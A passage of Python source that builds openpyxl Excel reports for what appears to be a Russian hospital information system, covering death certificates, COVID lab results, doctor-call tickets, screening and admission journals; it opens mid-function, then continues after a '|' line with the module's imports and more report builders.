            d2 = du_parse(i["Дата рождения"])
            delta = relativedelta(d1, d2)
            ws1.cell(row=r, column=11).value = delta.years
        except:
            ws1.cell(row=r, column=11).value = "-"
        # (a) disease or condition directly leading to death
        diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
        ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=13).value = diag_data[0]
        ws1.cell(row=r, column=14).value = diag_data[1]["code"]
        # (b) pathological condition that led to (a)
        diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
        ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=16).value = diag_data[0]
        ws1.cell(row=r, column=17).value = diag_data[1]["code"]
        # (c) initial (underlying) cause of death
        diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
        ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=19).value = diag_data[0]
        ws1.cell(row=r, column=20).value = diag_data[1]["code"]
        # (d) external cause for traumas and poisonings
        diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
        ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=22).value = diag_data[0]
        ws1.cell(row=r, column=23).value = diag_data[1]["code"]
        # II. other significant conditions contributing to death
        diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
        ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
        ws1.cell(row=r, column=25).value = ""
        # "Место смерти" may be a JSON string or an already-parsed dict; in
        # both cases the "address" field is extracted for the report.
        place_death_details = ""
        try:
            place_death_details = json.loads(i["Место смерти"])
            is_dict = True
            if is_dict:
                place_death_details = place_death_details.get("address", "-")
        except:
            is_dict = False
        if not is_dict:
            try:
                place_death_details = i["Место смерти"].get("address", None)
                is_dict = True
            except:
                is_dict = False
        if not is_dict:
            place_death_details = "-"
        ws1.cell(row=r, column=26).value = place_death_details
        # Hospital name
        ws1.cell(row=r, column=27).value = i.get("МО", "")
        # Road-accident flag
        ws1.cell(row=r, column=28).value = i["ДТП"]
        ws1.cell(row=r, column=29).value = i["Беременность"]
        if i.get("Заполнил", None):
            who_write = i.get("Заполнил")
        else:
            who_write = ""
        ws1.cell(row=r, column=30).value = who_write
        # Death-place type may be a {"title": ...} dict or absent/malformed.
        try:
            type_where_death = i["Типы мест наступления смерти"]["title"]
        except:
            type_where_death = "-"
        ws1.cell(row=r, column=31).value = type_where_death
        ws1.cell(row=r, column=32).value = i["hosp_okpo"]
        ws1.cell(row=r, column=33).value = i["hosp_okato"]
        rows = ws1[f'A{r}:AG{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_reserved_research_death_data(ws1, researches):
    """Fill the reserved death-certificate sheet: one row per reserve record.

    Records without a certificate number ("Номер") are skipped.  Bug fix:
    previously the row counter was advanced *before* the skip check, so each
    skipped record left a blank gap row in the sheet; the counter now only
    advances for rows that are actually written.

    :param ws1: worksheet prepared by ``statistic_reserved_research_death_base``
    :param researches: iterable of dicts describing reserved certificates
    :return: the worksheet (returned early if a falsy record is encountered)
    """
    style_border_res = NamedStyle(name="style_border_res_rz")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 4
    for i in researches:
        if not i:
            # Preserved behaviour: a falsy record terminates the report early.
            return ws1
        if not i.get("Номер", ""):
            # No certificate number reserved — nothing to report for this row.
            continue
        r += 1
        ws1.cell(row=r, column=1).value = i.get("hosp_title", "")
        ws1.cell(row=r, column=2).value = i.get("Номер", "")
        ws1.cell(row=r, column=3).value = i.get("date_create", "")
        ws1.cell(row=r, column=4).value = i.get("fio_patient", "")
        ws1.cell(row=r, column=5).value = i.get("napravleniye_id", "")
        rows = ws1[f'A{r}:E{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_research_by_covid_base(ws1, d1, d2, research_titile):
    """Write the 39 caption cells (row 1) of the COVID report; return ws1."""
    thin_side = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    captions = (
        ("№ заказа", 23),
        ("Название организации", 33),
        ("ОГРН организации", 33),
        ("Дата заказа", 23),
        ("Код услуги", 33),
        ("Название услуги", 33),
        ("Тест-система", 13),
        ("Дата взятия биоматериала", 13),
        ("Дата готовности результата", 13),
        ("Результат", 13),
        ("Тип исследования", 13),
        ("Значение результата", 33),
        ("Фамилия", 33),
        ("Имя", 33),
        ("Отчество", 33),
        ("Пол", 8),
        ("Дата рождения", 13),
        ("Телефон", 13),
        ("e-mail", 13),
        ("Тип ДУЛ", 13),
        ("Номер документа", 13),
        ("Серия документа", 13),
        ("СНИЛС", 23),
        ("ОМС", 23),
        ("Адрес регистрации регион", 23),
        ("Адрес регистрации район", 23),
        ("Адрес регистрации город", 23),
        ("Адрес регистрации улица", 23),
        ("Адрес регистрации дом", 23),
        ("Адрес регистрации строение", 23),
        ("Адрес регистрации квартира", 23),
        ("Адрес факт регион", 23),
        ("Адрес факт район", 23),
        ("Адрес факт город", 23),
        ("Адрес факт улица", 23),
        ("Адрес факт дом", 23),
        ("Адрес факт строение", 23),
        ("Адрес факт квартира", 23),
        ("Название лаборатории", 23),
        ("ОГРН лаборатории", 23),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=1, column=col_idx)
        header_cell.value = caption
        header_cell.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_by_covid_data(ws1, result_patient, patient_docs):
    """Fill the COVID research report, one row per confirmed result.

    Fixes over the previous version:
    * the local variable ``type`` shadowed the builtin — renamed ``doc_type``;
    * passport/birth-certificate values are split with ``str.partition`` so a
      value without the expected ``"@"`` separator no longer raises
      IndexError (serial gets the whole value, number stays empty).

    :param ws1: worksheet prepared by ``statistic_research_by_covid_base``
    :param result_patient: iterable of result rows (project ORM rows)
    :param patient_docs: mapping client_id -> list of {doc name: value} dicts
    :return: the worksheet
    """
    style_border_res = NamedStyle(name="style_border_res")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 1
    if not result_patient:
        return ws1
    for i in result_patient:
        r += 1
        ws1.cell(row=r, column=1).value = i.dir_id
        ws1.cell(row=r, column=2).value = i.hosp_title
        ws1.cell(row=r, column=3).value = i.hosp_ogrn
        ws1.cell(row=r, column=4).value = i.date_create
        ws1.cell(row=r, column=5).value = i.research_code
        ws1.cell(row=r, column=6).value = i.research_title
        ws1.cell(row=r, column=7).value = ""
        ws1.cell(row=r, column=8).value = i.date_reciev
        ws1.cell(row=r, column=9).value = i.date_confirm
        # Non-ELISA results are coded 0/1 (negative/positive); ELISA keeps the
        # raw value in the "Значение результата" column instead.
        if i.value and i.method_title != "ИФА":
            val_param = 0 if 'отриц' in i.value.lower() else 1
            result_val = ""
        else:
            result_val = i.value
            val_param = ""
        ws1.cell(row=r, column=10).value = val_param
        method_val = 2 if i.method_title == "ИФА" else 1
        ws1.cell(row=r, column=11).value = method_val
        ws1.cell(row=r, column=12).value = result_val
        ws1.cell(row=r, column=13).value = i.family
        ws1.cell(row=r, column=14).value = i.name
        ws1.cell(row=r, column=15).value = i.patronymic
        ws1.cell(row=r, column=16).value = 1 if i.sex.lower() == "м" else 2
        ws1.cell(row=r, column=17).value = i.born
        ws1.cell(row=r, column=18).value = ""
        ws1.cell(row=r, column=19).value = ""
        # Extract identity documents; values are stored as "серия@номер".
        patient_doc = patient_docs.get(i.client_id, None)
        doc_type, serial, number, snils, polis = "", "", "", "", ""
        if patient_doc:
            for pat_doc in patient_doc:
                for k, v in pat_doc.items():
                    if k == "снилс":
                        snils = v
                    elif k == "полис":
                        polis = v
                    elif "паспорт" in k.lower() or "рождение" in k.lower():
                        k_value = "Паспорт гражданина РФ" if "паспорт" in k.lower() else k
                        doc_type = k_value
                        # partition is safe when "@" is missing.
                        serial, _, number = v.partition("@")
        ws1.cell(row=r, column=20).value = doc_type
        ws1.cell(row=r, column=21).value = number
        ws1.cell(row=r, column=22).value = serial
        ws1.cell(row=r, column=23).value = snils
        ws1.cell(row=r, column=24).value = polis
        ws1.cell(row=r, column=25).value = "Иркутская область"
        ws1.cell(row=r, column=39).value = i.hosp_title
        ws1.cell(row=r, column=40).value = i.hosp_ogrn
        rows = ws1[f'A{r}:C{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_research_by_sum_lab_base(ws1, d1, d2, research_titile):
    """Write the header of the per-laboratory totals sheet.

    Bug fix: the function previously ended with a bare ``return`` (returning
    None) while every sibling ``*_base`` builder returns the worksheet; it
    now returns ``ws1`` for consistency with callers that use the result.

    :param ws1: target worksheet
    :param d1: period start (display string)
    :param d2: period end (display string)
    :param research_titile: report title placed in cell B1
    :return: the same worksheet, prepared
    """
    style_border = NamedStyle(name="style_border")
    bd = Side(style='thin', color="000000")
    style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border.font = Font(bold=True, size=11)
    style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    columns = [
        ('Лаборатория', 33),
        ('Услуга', 55),
        ('Кол-во', 25),
    ]
    for idx, column in enumerate(columns, 1):
        ws1.cell(row=4, column=idx).value = column[0]
        ws1.column_dimensions[get_column_letter(idx)].width = column[1]
        ws1.cell(row=4, column=idx).style = style_border
    return ws1
def statistic_research_by_sum_lab_data(ws1, researches):
    """Write lab / service / count rows starting at row 5; return ws1."""
    thin_side = Side(style='thin', color="000000")
    row_style = NamedStyle(name="style_border_res")
    row_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    row_style.font = Font(bold=False, size=11)
    row_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    if not researches:
        return ws1
    for row_num, research in enumerate(researches, 5):
        ws1.cell(row=row_num, column=1).value = research.lab_title
        ws1.cell(row=row_num, column=2).value = research.research_title
        ws1.cell(row=row_num, column=3).value = research.sum_research_id
        for styled_row in ws1[f'A{row_num}:C{row_num}']:
            for styled_cell in styled_row:
                styled_cell.style = row_style
    return ws1
def statistic_research_by_details_lab_base(ws1, d1, d2, research_titile):
    """Header (row 4) of the detailed per-laboratory sheet; returns ws1."""
    thin_side = Side(style='thin', color="000000")
    header_style = NamedStyle(name="style_border")
    header_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('ID', 23),
        ('лаборатория', 15),
        ('анализ', 35),
        ('дата', 15),
        ('время', 15),
        ('аппарат', 15),
        ('дата взятия', 15),
        ('время взятия', 15),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=4, column=col_idx)
        header_cell.value = caption
        header_cell.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_research_by_details_lab_data(ws1, researches):
    """Write one detail row per lab research record; return the worksheet.

    Falsy field values are rendered as empty strings.
    """
    thin_side = Side(style='thin', color="000000")
    row_style = NamedStyle(name="style_border_res")
    row_style.border = Border(left=thin_side, top=thin_side, right=thin_side, bottom=thin_side)
    row_style.font = Font(bold=False, size=11)
    row_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    if not researches:
        return ws1
    for row_num, rec in enumerate(researches, 5):
        row_values = (
            rec.napravleniye_id or "",
            rec.lab_title or "",
            rec.research_title or "",
            rec.date_confirm or "",
            rec.time_confirm or "",
            rec.name or "",
            rec.date_tubes or "",
            rec.time_tubes or "",
        )
        for col_idx, cell_value in enumerate(row_values, 1):
            ws1.cell(row=row_num, column=col_idx).value = cell_value
        for styled_row in ws1[f'A{row_num}:H{row_num}']:
            for styled_cell in styled_row:
                styled_cell.style = row_style
    return ws1
def statistic_message_ticket_base(ws1, d1, d2, style_border):
    """Header area of the doctor-call ("Обращения") sheet; returns ws1."""
    for row_num, text in ((1, 'Обращения'), (2, 'Период:'), (3, f'c {d1} по {d2}')):
        ws1.cell(row=row_num, column=1).value = text
    captions = (
        ('МО', 20),
        ('Номер', 20),
        ('Создано', 15),
        ('Физ. лицо', 26),
        ('Телефон', 20),
        ('Адрес', 20),
        ('Цель', 20),
        ('Примечания', 26),
        ('Статус', 16),
        ('Источник', 16),
        ('Создатель', 26),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=4, column=col_idx)
        header_cell.value = caption
        header_cell.style = style_border
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def statistic_message_ticket_data(ws1, message_ticket_sql, style_border_res):
    """Write one row per doctor-call ticket; return the worksheet.

    Bug fix: the "Источник" column previously evaluated
    ``statuses.get(ticket.is_external)`` — looking a boolean up in the
    status-code dictionary — so the reported source depended on whether
    0/1 happened to be status keys.  It now tests the ``is_external`` flag
    directly.

    :param ws1: worksheet prepared by ``statistic_message_ticket_base``
    :param message_ticket_sql: iterable of ticket rows
    :param style_border_res: cell style applied to every detail row
    :return: the worksheet
    """
    r = 4
    purposes = dict(DoctorCall.PURPOSES)
    statuses = dict(DoctorCall.STATUS)
    for ticket in message_ticket_sql:
        r += 1
        ws1.cell(row=r, column=1).value = ticket.hospital_short_title or ticket.hospital_title
        ws1.cell(row=r, column=2).value = ticket.external_num or ticket.num
        ws1.cell(row=r, column=3).value = ticket.date_create
        ws1.cell(row=r, column=4).value = f'{ticket.family} {ticket.name} {ticket.patronymic}'
        ws1.cell(row=r, column=5).value = ticket.phone
        ws1.cell(row=r, column=6).value = ticket.address
        ws1.cell(row=r, column=7).value = purposes.get(ticket.purpose, '')
        ws1.cell(row=r, column=8).value = ticket.comment
        ws1.cell(row=r, column=9).value = statuses.get(ticket.status, '')
        # Source of the ticket: created via the public site or by an operator.
        ws1.cell(row=r, column=10).value = 'интернет' if ticket.is_external else 'оператор'
        who_create = ""
        if ticket.fio and ticket.short_title:
            who_create = f"{ticket.fio}-{ticket.short_title}"
        ws1.cell(row=r, column=11).value = who_create
        rows = ws1[f'A{r}:K{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_message_purpose_total_data(ws1, message_total, d1, d2, style_border_res):
    """Per-purpose totals of doctor-call tickets plus a grand-total row.

    Writes the header captions on row 5, one data row per purpose, then an
    'Итого' row with SUM formulas over the data rows.  Returns the worksheet.
    """
    ws1.cell(row=1, column=1).value = 'Обращения'
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (('Цель', 20), ('Всего', 20), ('Выполнено', 20))
    for col_idx, (caption, width) in enumerate(captions, 1):
        header_cell = ws1.cell(row=5, column=col_idx)
        header_cell.value = caption
        header_cell.style = style_border_res
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    purposes = dict(DoctorCall.PURPOSES)
    row_num = 5
    first_data_row = row_num + 1
    for purpose_row in message_total:
        row_num += 1
        ws1.cell(row=row_num, column=1).value = purposes.get(purpose_row.total_purpose, '')
        ws1.cell(row=row_num, column=2).value = purpose_row.sum_total_purpose
        ws1.cell(row=row_num, column=3).value = purpose_row.sum_execute_purpose or ''
        for styled_row in ws1[f'A{row_num}:C{row_num}']:
            for styled_cell in styled_row:
                styled_cell.style = style_border_res
    total_row = row_num + 1
    total_values = ('Итого', f'=SUM(B{first_data_row}:B{row_num})', f'=SUM(C{first_data_row}:C{row_num})')
    for col_idx, total_value in enumerate(total_values, 1):
        total_cell = ws1.cell(row=total_row, column=col_idx)
        total_cell.value = total_value
        total_cell.style = style_border_res
    return ws1
def statistic_screening_month_data(ws1, data, month, year, style_border_res):
    """Build the monthly cervical-screening sheet.

    Row 5 holds the column captions; row 6 holds the metric values for the
    requested month.  ``data`` maps metric keys to values; each key is routed
    to its spreadsheet column through ``key_to_column`` (this replaces the
    original 16-branch if-chain with identical behavior).  Columns 8 and 18
    have no corresponding key and stay empty, as before.  Unknown keys are
    silently ignored, as before.
    """
    ws1.cell(row=1, column=1).value = 'Скрининг'
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=2, column=2).value = f'{month_dict[int(month)]}-{year}'
    size = 12
    columns = [
        ('Месяц', 10),
        ('Число женщин 18-69 лет, проживающих на прикрепленной территории', size),
        ('Число женщин 30 -65 лет, подлежащих скринингу (всего)', size),
        ('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
        ('Число женщин 30-65 лет, прошедших скрининг', size),
        ('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
        ('Число женщин, которым выполнен ПАП-тест от общего числа прошедших скрининг', size),
        ('Число женщин, по препаратам которых получили цитологический результат', size),
        ('Из них, препараты признаны адекватными', size),
        ('Недостаточно адекватными', size),
        ('Не адекватными', size),
        ('Из числа женщин с недостаточно адекватным, неадекватным результатом, число вызванных женщин, у которых повторно взят материал на цитологическое исследование', size),
        ('В т.ч. АSCUS', size),
        ('В т.ч. легкое интраэпителиальное поражение CIN I, признаки ВПЧ', size),
        ('Умеренное интраэпителиальное поражение CIN I-II, II', size),
        ('Тяжелое интраэпителиальное поражение CIN II-III, III', size),
        ('cr in situ', size),
        ('Подозрение на ЗНО шейки матки', size),
        ('Всего по Папа-Николау', size),
    ]
    for idx, column in enumerate(columns, 1):
        ws1.cell(row=5, column=idx).value = column[0]
        ws1.column_dimensions[get_column_letter(idx)].width = column[1]
        ws1.cell(row=5, column=idx).style = style_border_res
    ws1.cell(row=6, column=1).value = f'{month_dict[int(month)]}'
    ws1.cell(row=6, column=1).style = style_border_res
    # Metric key -> destination column on row 6.
    key_to_column = {
        "attached_count_age_for_month": 2,
        "count_regplan_for_month": 3,
        "count_dispensarization_from_screening": 4,
        "pass_screening": 5,
        "pass_screening_in_dispensarization": 6,
        "pass_pap_analysis": 7,
        "pass_pap_adequate_result_value": 9,
        "pass_pap_not_enough_adequate_result_value": 10,
        "pass_pap_not_adequate_result_value": 11,
        "count_people_dublicate": 12,
        "pass_pap_ascus_result_value": 13,
        "pass_pap_cin_i_result_value": 14,
        "pass_pap_cin_i_ii_result_value": 15,
        "pass_pap_cin_ii_iii_result_value": 16,
        "pass_pap_cr_in_situ_result_value": 17,
        "count_pap_analysys": 19,
    }
    for k, v in data.items():
        col = key_to_column.get(k)
        if col is None:
            continue  # keys with no mapped column were ignored by the original chain too
        ws1.cell(row=6, column=col).value = v
        ws1.cell(row=6, column=col).style = style_border_res
    return ws1
def get_table_diagnos(diagnos_data, item):
    """Extract (period, diagnosis details) from one certificate field.

    ``diagnos_data[item]`` is either an already-parsed dict or a JSON string
    of the shape ``{"rows": [[period_date, period_unit, details_json, ...]]}``,
    where ``details_json`` decodes to ``{"code": ..., "title": ...}``.

    :return: tuple ``(period_data, diag_details)``; when the entry cannot be
        decoded, ``("-", {"code": "-", "title": "-"})`` is returned instead.

    The original version used bare ``except:`` clauses; the probes are now
    explicit and the fallback catches only the decode/access errors that the
    lookup can actually raise.
    """
    raw = diagnos_data[item]
    # Dict-like entries are used as-is; anything else is a JSON string.
    if hasattr(raw, "keys"):
        diag_data = raw
    else:
        diag_data = json.loads(raw)
    diag_details = {}
    period_data = ""
    try:
        first_row = diag_data["rows"][0]
        diag_details = json.loads(first_row[2])
        period_data = f'{first_row[0]} {first_row[1]}'
    except (KeyError, IndexError, TypeError, ValueError):
        # Missing/short "rows" or malformed details JSON -> placeholder output.
        diag_details["code"] = "-"
        diag_details["title"] = "-"
        period_data = "-"
    return (period_data, diag_details)
|
import json
from collections import OrderedDict
import openpyxl
from openpyxl.styles import Border, Side, Alignment, Font, NamedStyle
from openpyxl.utils.cell import get_column_letter
from directions.models import IstochnikiFinansirovaniya
from doctor_call.models import DoctorCall
from hospitals.tfoms_hospital import HOSPITAL_TITLE_BY_CODE_TFOMS
from utils.dates import normalize_dash_date
from dateutil.parser import parse as du_parse
from dateutil.relativedelta import relativedelta
# Russian month names keyed by 1-based month number; used in sheet captions below.
month_dict = {1: 'Январь', 2: 'Февраль', 3: 'Март', 4: 'Апрель', 5: 'Май', 6: 'Июнь', 7: 'Июль', 8: 'Август', 9: 'Сентябрь', 10: 'Октябрь', 11: 'Ноябрь', 12: 'Декабрь'}
def job_total_base(ws1, month, type_fin):
    """
    Skeleton for the job totals sheet: month caption, financing source,
    one narrow column per day of the month.
    :return: the worksheet
    """
    fin_source = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
    ws1.cell(row=1, column=1).value = 'Месяц'
    ws1.cell(row=1, column=2).value = month_dict.get(month)
    ws1.cell(row=2, column=1).value = fin_source.title
    ws1.cell(row=4, column=1).value = 'Вид работы'
    ws1.column_dimensions[get_column_letter(1)].width = 22
    for day in range(1, 32):
        day_col = day + 1
        ws1.cell(row=4, column=day_col).value = str(day)
        ws1.column_dimensions[get_column_letter(day_col)].width = 4
    return ws1
def jot_total_titles(ws1, titles):
    """
    Write the job-type titles into column 1 starting at row 5.
    :param ws1: target worksheet
    :param titles: sequence of job-type titles
    :return: (worksheet, ordered mapping title -> row number)
    """
    title_rows = OrderedDict()
    for offset, title in enumerate(titles):
        row_num = 5 + offset
        ws1.cell(row=row_num, column=1).value = title
        title_rows[title] = row_num
    return ws1, title_rows
def job_total_data(ws1, titles, data):
    """Fill per-day UET values.

    :param titles: mapping job title -> worksheet row (from jot_total_titles)
    :param data: mapping day-of-month -> {job title -> uet value}
    """
    for day, per_job in data.items():
        for job_title, uet_value in per_job.items():
            target_row = titles.get(job_title)
            ws1.cell(row=target_row, column=day + 1).value = str(uet_value)
def passed_research_base(ws1, data_date):
    """
    Header for the hospitalization admission/refusal journal (form 001/У):
    merged title row plus the 19 column captions on row 2.
    :param ws1: target worksheet
    :param data_date: period string embedded into the journal title
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = f'ЖУРНАЛ учета приема и отказов в госпитализации за {data_date}г.(мед.документация Ф№001/У утв. МИНЗДРАВОМ СССР 04.10.1980г. №1030)'
    ws1.cell(row=1, column=1).style = header_style
    # Tall header row so the wrapped captions stay readable.
    ws1.row_dimensions[2].height = 115
    captions = (
        ('№ п/п', 5),
        ('Время поступления', 8),
        ('Услуга (дата-время подтверждения)', 14),
        ('Направление', 11),
        ('Фамилия, имя, отчество больного', 20),
        ('Дата рождения', 10),
        ('Постоянное место жительства или адрес родственников, близких и N телефона', 23),
        ('Каким учреждением был направлен или доставлен', 15),
        ('Отделение, в которое помещен больной', 12),
        ('N карты (стационарного) больного', 10),
        ('Диагноз направившего учреждения', 7),
        ('Диагноз при поступлении', 7),
        ('№ ДДУ', 16),
        ('Полис', 21),
        ('Примечания', 10),
        ('Выписан, переведен в другой стационар, умер (вписать и указать дату и название стационара, куда переведен', 20),
        ('Отметка о сообщении родственникам или учреждению', 11),
        ('Если не был госпитализирован указать причину и принятые меры', 11),
        ('отказ в приеме первичный, повторный (вписать)', 11),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=2, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def passed_research_data(ws1, data):
    """Fill the admission/refusal journal rows (one sheet row per record).

    ``data`` is a sequence of positionally-indexed result rows; the per-field
    mapping is spelled out by the local variable assignments below.  Rows are
    written starting at sheet row 3 and each gets a thin border style.

    NOTE(review): indices 0 and 9 of each record are never read, while the
    admission time is taken from index 19 — looks asymmetric; confirm against
    the producing SQL's column order.
    """
    r = 2   # last written sheet row; data starts at row 3
    n = 0   # running row counter shown in column 1
    empty = ' '
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        current_research_title = i[1]
        current_polis_n = i[2] or empty
        current_polis_who_give = i[3] or empty
        current_napravlen = i[4]
        current_datatime_confirm = i[5]
        current_create_napr = i[6]
        current_diagnoz = i[7] or empty
        current_result = i[8] or empty
        current_napr_time_at = i[19] or empty  # NOTE(review): presumably admission time; see docstring
        current_num_card = i[10]
        current_family = i[11] or empty
        current_name = i[12] or empty
        current_patronymic = i[13] or empty
        current_birthday = i[14] or empty
        current_main_address = i[15] if i[15] else ''
        current_fact_address = i[16] if i[16] else empty
        # Registered address wins; fall back to the actual address.
        current_address = current_main_address if current_main_address else current_fact_address
        current_work_place = i[17] or empty
        current_kem_napravlen = i[18] or empty
        r = r + 1
        n = n + 1
        ws1.cell(row=r, column=1).value = n
        ws1.cell(row=r, column=2).value = current_napr_time_at
        ws1.cell(row=r, column=3).value = f'{current_research_title},\n({current_datatime_confirm})'
        ws1.cell(row=r, column=4).value = f'{current_napravlen},\n({current_create_napr})'
        ws1.cell(row=r, column=5).value = current_family + ' ' + current_name + ' ' + current_patronymic
        ws1.cell(row=r, column=6).value = current_birthday
        ws1.cell(row=r, column=7).value = current_address
        ws1.cell(row=r, column=8).value = current_kem_napravlen
        ws1.cell(row=r, column=9).value = 'Приемное'
        ws1.cell(row=r, column=10).value = current_num_card
        ws1.cell(row=r, column=11).value = ' '
        ws1.cell(row=r, column=12).value = current_diagnoz
        ws1.cell(row=r, column=13).value = current_work_place
        ws1.cell(row=r, column=14).value = current_polis_n + ', ' + current_polis_who_give
        ws1.cell(row=r, column=15).value = ' '
        ws1.cell(row=r, column=16).value = current_result
        ws1.cell(row=r, column=17).value = ' '
        ws1.cell(row=r, column=18).value = ' '
        ws1.cell(row=r, column=19).value = ' '
        # Border every cell of the freshly written row.
        for j in range(1, 20):
            ws1.cell(row=r, column=j).style = style_border1
    return ws1
def covid_call_patient_base(ws1):
    """
    Header for the COVID call-round sheet: merged title row plus the five
    column captions on row 2.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'Обзвон'
    ws1.cell(row=1, column=1).style = header_style
    # Header row height.
    ws1.row_dimensions[2].height = 15
    captions = (
        ('ФИО', 25),
        ('№ карты', 15),
        ('Телефон', 20),
        ('Оператор', 25),
        ('Дата', 25),
    )
    for col_idx, (caption, width) in enumerate(captions, 1):
        head = ws1.cell(row=2, column=col_idx)
        head.value = caption
        head.style = header_style
        ws1.column_dimensions[get_column_letter(col_idx)].width = width
    return ws1
def covid_call_patient_data(ws1, data):
    """Fill the COVID call-round sheet: one row per patient starting at row 3.

    Bug fix: the row counter was never advanced, so every record overwrote
    row 3 (the sibling covid_swab_data does advance it); each record now
    gets its own row.
    :return: the worksheet
    """
    r = 3
    style_border1 = NamedStyle(name="style_border1")
    bd = Side(style='thin', color="000000")
    style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border1.font = Font(bold=False, size=11)
    style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
    for i in data:
        ws1.cell(row=r, column=1).value = i["fio_patient"]
        ws1.cell(row=r, column=2).value = i["number"]
        ws1.cell(row=r, column=3).value = i["Контактный телефон"]
        ws1.cell(row=r, column=4).value = i["Оператор"]
        ws1.cell(row=r, column=5).value = normalize_dash_date(i["Дата следующего звонка"])
        for j in range(1, 6):
            ws1.cell(row=r, column=j).style = style_border1
        r += 1  # advance to the next sheet row (was missing)
    return ws1
def covid_swab_base(ws1):
    """
    Header for the repeat-swab sheet: merged title row plus the six column
    captions on row 2.
    :return: the worksheet
    """
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
    ws1.cell(row=1, column=1).value = 'Повторный мазок'
    ws1.cell(row=1, column=1).style = header_style
    # Header row height.
    ws1.row_dimensions[2].height = 15
    captions = (
        ('ФИО', 25),
        ('№ карты', 15),
        ('Телефон', 20),
        ('Оператор', 25),
        ('Дата', 25),
        ('Адрес', 55),
    )
